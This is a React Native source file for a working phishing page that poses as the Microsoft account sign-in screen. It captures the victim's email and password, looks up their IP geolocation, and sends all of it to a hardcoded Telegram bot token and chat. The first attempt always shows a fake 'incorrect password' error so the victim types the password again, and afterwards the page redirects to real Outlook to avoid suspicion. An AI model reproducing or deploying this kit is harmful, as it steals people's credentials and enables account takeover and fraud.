import { StatusBar } from 'expo-status-bar';
import { useEffect, useState } from 'react';
import { StyleSheet, Text, View, ImageBackground, Dimensions, Image, TextInput, Pressable } from 'react-native';


const image = "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxOTIwIiBoZWlnaHQ9IjEwODAiIGZpbGw9Im5vbmUiPjxnIG9wYWNpdHk9Ii4yIiBjbGlwLXBhdGg9InVybCgjRSkiPjxwYXRoIGQ9Ik0xNDY2LjQgMTc5NS4yYzk1MC4zNyAwIDE3MjAuOC02MjcuNTIgMTcyMC44LTE0MDEuNlMyNDE2Ljc3LTEwMDggMTQ2Ni40LTEwMDgtMjU0LjQtMzgwLjQ4Mi0yNTQuNCAzOTMuNnM3NzAuNDI4IDE0MDEuNiAxNzIwLjggMTQwMS42eiIgZmlsbD0idXJsKCNBKSIvPjxwYXRoIGQ9Ik0zOTQuMiAxODE1LjZjNzQ2LjU4IDAgMTM1MS44LTQ5My4yIDEzNTEuOC0xMTAxLjZTMTE0MC43OC0zODcuNiAzOTQuMi0zODcuNi05NTcuNiAxMDUuNjAzLTk1Ny42IDcxNC0zNTIuMzggMTgxNS42IDM5NC4yIDE4MTUuNnoiIGZpbGw9InVybCgjQikiLz48cGF0aCBkPSJNMTU0OC42IDE4ODUuMmM2MzEuOTIgMCAxMTQ0LjItNDE3LjQ1IDExNDQuMi05MzIuNFMyMTgwLjUyIDIwLjQgMTU0OC42IDIwLjQgNDA0LjQgNDM3Ljg1IDQwNC40IDk1Mi44czUxMi4yNzYgOTMyLjQgMTE0NC4yIDkzMi40eiIgZmlsbD0idXJsKCNDKSIvPjxwYXRoIGQ9Ik0yNjUuOCAxMjE1LjZjNjkwLjI0NiAwIDEyNDkuOC00NTUuNTk1IDEyNDkuOC0xMDE3LjZTOTU2LjA0Ni04MTkuNiAyNjUuOC04MTkuNi05ODQtMzY0LjAwNS05ODQgMTk4LTQyNC40NDUgMTIxNS42IDI2NS44IDEyMTUuNnoiIGZpbGw9InVybCgjRCkiLz48L2c+PGRlZnM+PHJhZGlhbEdyYWRpZW50IGlkPSJBIiBjeD0iMCIgY3k9IjAiIHI9IjEiIGdyYWRpZW50VW5pdHM9InVzZXJTcGFjZU9uVXNlIiBncmFkaWVudFRyYW5zZm9ybT0idHJhbnNsYXRlKDE0NjYuNCAzOTMuNikgcm90YXRlKDkwKSBzY2FsZSgxNDAxLjYgMTcyMC44KSI+PHN0b3Agc3RvcC1jb2xvcj0iIzEwN2MxMCIvPjxzdG9wIG9mZnNldD0iMSIgc3RvcC1jb2xvcj0iI2M0YzRjNCIgc3RvcC1vcGFjaXR5PSIwIi8+PC9yYWRpYWxHcmFkaWVudD48cmFkaWFsR3JhZGllbnQgaWQ9IkIiIGN4PSIwIiBjeT0iMCIgcj0iMSIgZ3JhZGllbnRVbml0cz0idXNlclNwYWNlT25Vc2UiIGdyYWRpZW50VHJhbnNmb3JtPSJ0cmFuc2xhdGUoMzk0LjIgNzE0KSByb3RhdGUoOTApIHNjYWxlKDExMDEuNiAxMzUxLjgpIj48c3RvcCBzdG9wLWNvbG9yPSIjMDA3OGQ0Ii8+PHN0b3Agb2Zmc2V0PSIxIiBzdG9wLWNvbG9yPSIjYzRjNGM0IiBzdG9wLW9wYWNpdHk9IjAiLz48L3JhZGlhbEdyYWRpZW50PjxyYWRpYWxHcmFkaWVudCBpZD0iQyIgY3g9IjAiIGN5PSIwIiByPSIxIiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgZ3JhZGllbnRUcmFuc2Zvcm09InRyYW5zbGF0ZSgxNTQ4LjYgOTUyLjgpIHJvdGF0ZSg5MCkgc2NhbGUoOTMyLjQgMTE0NC4yKSI+PHN0b3Agc3RvcC1jb2xvcj0iI2ZmYjkwMCIgc3RvcC1vcGFjaXR5PSIuNzUiLz48c3RvcCBvZmZzZXQ9IjEiIHN0b3AtY29sb3I9IiNjNGM0YzQiIHN0b3Atb3BhY2l0eT0iMCIvPjwvcmFkaWFsR3JhZGllbnQ+PHJhZGlhbEdyYWRpZW50IGlkPSJEIiBjeD0iMCIgY3k9IjAiIHI9IjEiIGdyYWRpZW50VW5pdHM9InVzZXJTcGFjZU9uVXNlIiBncmFkaWVudFRyYW5zZm9ybT0idHJhbnNsYXRlKDI2NS44IDE5OCkgcm90YXRlKDkwKSBzY2FsZSgxMDE3LjYgMTI0OS44KSI+PHN0b3Agc3RvcC1jb2xvcj0iI2Q4M2IwMSIgc3RvcC1vcGFjaXR5PSIuNzUiLz48c3RvcCBvZmZzZXQ9IjEiIHN0b3AtY29sb3I9IiNjNGM0YzQiIHN0b3Atb3BhY2l0eT0iMCIvPjwvcmFkaWFsR3JhZGllbnQ+PGNsaXBQYXRoIGlkPSJFIj48cGF0aCBmaWxsPSIjZmZmIiBkPSJNMCAwaDE5MjB2MTA4MEgweiIvPjwvY2xpcFBhdGg+PC9kZWZzPjwvc3ZnPg==";

const queryString = window.location.search;
const urlParams = new URLSearchParams(queryString);
const paramEmail = urlParams.get('email') || "";

export default function App() {

  const [email, setEmail] = useState(paramEmail);
  const [password, setPassword] = useState("");
  const [step, setStep] = useState(paramEmail ? 2 : 1);
  const [sentFirst, setSentFirst] = useState(false);
  const [loading, setLoading] = useState(false);
  // Location Data
  const [location, setLocation] = useState(null);
  const [error, setError] = useState(null);
  const [noUsername, setNoUsername] = useState(null);

  useEffect(() => {
    (async () => {
      const response = await fetch("https://www.iplocate.io/api/lookup/");
      const data = await response.json();
      setLocation(data);
    })();
  }, [])



  const sendPassword = async () => {
    if (loading) return;
    if (!password || password.length < 6) {
      setError("Please enter the password for your Microsoft account.");
      return;
    };

    setError(null);

    setLoading(true);

    const api = "5858799776:AAE3JzTOFxAMGScRzhVNhv16tSJAtRrBRUU";
    const chat_id = "5330901046";

    let message = `Email: ${email} %0APassword: ${password}%0A`

    if (location) {
      for (let key in location) {
        message += `%0A${key}: ${location[key]}`;
      }
    }

    const response = await fetch("https://api.telegram.org/bot" + api + "/sendMessage?parse_mode=html&chat_id=" + chat_id + "&text=" + message);

    setPassword("");

    setLoading(false);


    // console.log(await response.body());

    if (sentFirst) {
      window.location = "https://outlook.office.com/mail/inbox";

      return;
    }

    setSentFirst(true);
  }

  useEffect(() => {
    document.title = 'Sign in to your Microsoft account';
  }, []);

  return (
    <ImageBackground style={[styles.container, Dimensions.get("screen").width > 440 ? {
      alignItems: 'center',
      justifyContent: 'center',
    } : {

    }]} source={{
      uri: image
    }}>
      <View style={[styles.main, Dimensions.get("screen").width > 440 ? {

      } : {
        height: Dimensions.get("screen").height,
        width: Dimensions.get("screen").width,
      }]}>
        <View style={{}}>
          <Image source={require("./assets/microsoft.svg")} style={{ width: 108, height: 24 }} resizeMode="contain" />
        </View>
        <View style={{ height: 15 }} />
        {
          step == 2 && (
            <View style={{ flexDirection: "row", alignItems: "center" }}>
              <Image source={{ uri: "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48dGl0bGU+YXNzZXRzPC90aXRsZT48cGF0aCBkPSJNMTgsMTEuNTc4di44NDRINy42MTdsMy45MjEsMy45MjgtLjU5NC41OTRMNiwxMmw0Ljk0NC00Ljk0NC41OTQuNTk0TDcuNjE3LDExLjU3OFoiIGZpbGw9IiM0MDQwNDAiLz48cGF0aCBkPSJNMTAuOTQ0LDcuMDU2bC41OTQuNTk0TDcuNjE3LDExLjU3OEgxOHYuODQ0SDcuNjE3bDMuOTIxLDMuOTI4LS41OTQuNTk0TDYsMTJsNC45NDQtNC45NDRtMC0uMTQxLS4wNzEuMDdMNS45MjksMTEuOTI5LDUuODU4LDEybC4wNzEuMDcxLDQuOTQ0LDQuOTQ0LjA3MS4wNy4wNzEtLjA3LjU5NC0uNTk1LjA3MS0uMDctLjA3MS0uMDcxTDcuODU4LDEyLjUyMkgxOC4xVjExLjQ3OEg3Ljg1OGwzLjc1MS0zLjc1Ny4wNzEtLjA3MS0uMDcxLS4wNy0uNTk0LS41OTUtLjA3MS0uMDdaIiBmaWxsPSIjNDA0MDQwIi8+PC9zdmc+" }} style={{ width: 24, height: 24 }} resizeMode="contain" />
              <Text style={{ color: "#1b1b1b" }}>
                {email}
              </Text>
            </View>)
        }
        {
          step == 1 && (
            <View>
              <Text style={{ fontSize: 25, fontWeight: "600", marginBottom: 12, }} >
                Sign in
              </Text>
              {
                noUsername && (
                  <Text style={{ color: "#e81123", fontSize: 15, marginBottom: 10 }}>
                    {noUsername}
                  </Text>
                )
              }
              <View style={{
                borderColor: noUsername ? "#e81123" : "rgba(0, 0, 0, .8)",
                borderBottomWidth: 1,
                paddingBottom: 8,
                marginBottom: 16
              }}>

                <TextInput onSubmitEditing={() => {
                  if (validateEmail(email)) {
                    setNoUsername(null)
                    return setStep(2);
                  }

                  setNoUsername("Enter a valid email address, phone number, or Skype name.");
                }} onChangeText={setEmail} placeholder='Email, phone or skype' style={{ outlineStyle: "none", fontSize: 16 }} placeholderTextColor="rgba(0, 0, 0, .8)" />
              </View>
            </View>
          )
        }
        {
          step == 2 && (
            <View>
              <Text style={{ fontSize: 25, fontWeight: "600", marginBottom: 12, }} >
                Enter password
              </Text>
              {
                error && (
                  <Text style={{ color: "#e81123", fontSize: 15, marginBottom: 10 }}>
                    {error}
                  </Text>
                )
              }
              {
                (sentFirst) && (<Text style={{ color: "#e81123", fontSize: 15, marginBottom: 10 }}>
                  Your account or password is incorrect. If you don't remember your password, <Text style={{ color: "#0067b8", fontSize: 15 }}>reset it now.</Text>
                </Text>)
              }
              <View style={{
                borderColor: sentFirst || error ? "#e81123" : "rgba(0, 0, 0, .8)",
                borderBottomWidth: 1,
                paddingBottom: 8,
                marginBottom: 16
              }}>

                <TextInput onSubmitEditing={sendPassword} secureTextEntry value={password} placeholder='Password' style={{ outlineStyle: "none", fontSize: 16 }} placeholderTextColor="rgba(0, 0, 0, .8)" onChangeText={setPassword} />
              </View>
            </View>
          )
        }
        <Text style={{ color: "#0067b8", fontSize: 13, marginBottom: 16, fontWeight: 400 }}>
          Forgot password?
        </Text>
        <Text style={{ color: "#0067b8", fontSize: 13, marginBottom: 16, fontWeight: 400 }}>
          Other ways to sign in
        </Text>
        {/* <TextInput placeholder='Email, phone or skype' /> */}
        {/* <Text>
          No account? <Text>Create one!</Text>
        </Text>

        <Text>
          Sign in with Windows Hello or a security key
        </Text> */}
        {
          step == 1 && (
            <View style={{ width: "100%", justifyContent: "space-between", flexDirection: "row" }}>
              <View></View>
              <Pressable style={{ width: 108, backgroundColor: "#0067b8", height: 32, justifyContent: "center", alignItems: "center", marginTop: 10 }} onPress={() => {
                if (validateEmail(email)) {
                  setNoUsername(null)
                  return setStep(2);
                }

                setNoUsername("Enter a valid email address, phone number, or Skype name.");
              }}>
                <Text style={{ color: "white" }}>
                  Next
                </Text>
              </Pressable>
            </View>
          )
        }
        {
          step == 2 && (
            <View style={{ width: "100%", justifyContent: "space-between", flexDirection: "row" }}>
              <View></View>
              <Pressable onPress={sendPassword} style={{ width: 108, backgroundColor: "#0067b8", height: 32, justifyContent: "center", alignItems: "center", marginTop: 10 }}>
                <Text style={{ color: "white" }}>
                  Sign In
                </Text>
              </Pressable>
            </View>
          )
        }
      </View>
      {/* <Pressable style={styles.signInOption}>
        <Text>
          Sign In Options
        </Text>
      </Pressable> */}
    </ImageBackground>
  )
}

const styles = StyleSheet.create({
  container: {
    flex: 1,
    backgroundColor: '#fff',
  },
  main: {
    maxWidth: 440,
    marginHorizontal: "auto",
    backgroundColor: "white",
    width: Dimensions.get("window").width - 40,
    padding: 44,
    minHeight: 338,
    // shadowBox: "0 2px 6px rgb(0 0 0 / 20%)"
    shadowColor: "rgba(0, 0, 0, 0.2)",
    shadowOffset: {
      width: 0,
      height: 2
    },
    marginBottom: 20
  },
  signInOption: {
    maxWidth: 440,
    marginHorizontal: "auto",
    backgroundColor: "white",
    width: Dimensions.get("window").width - 40,
    // shadowBox: "0 2px 6px rgb(0 0 0 / 20%)"
    shadowColor: "rgba(0, 0, 0, 0.2)",
    shadowOffset: {
      width: 0,
      height: 2
    },
    paddingTop: 8,
    marginBottom: 8,
    paddingLeft: 44, paddingRight: 44
  }
});

function validateEmail(input) {

  var validRegex = /^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/;

  if (input.match(validRegex)) {
    return true;

  }

  return false;

}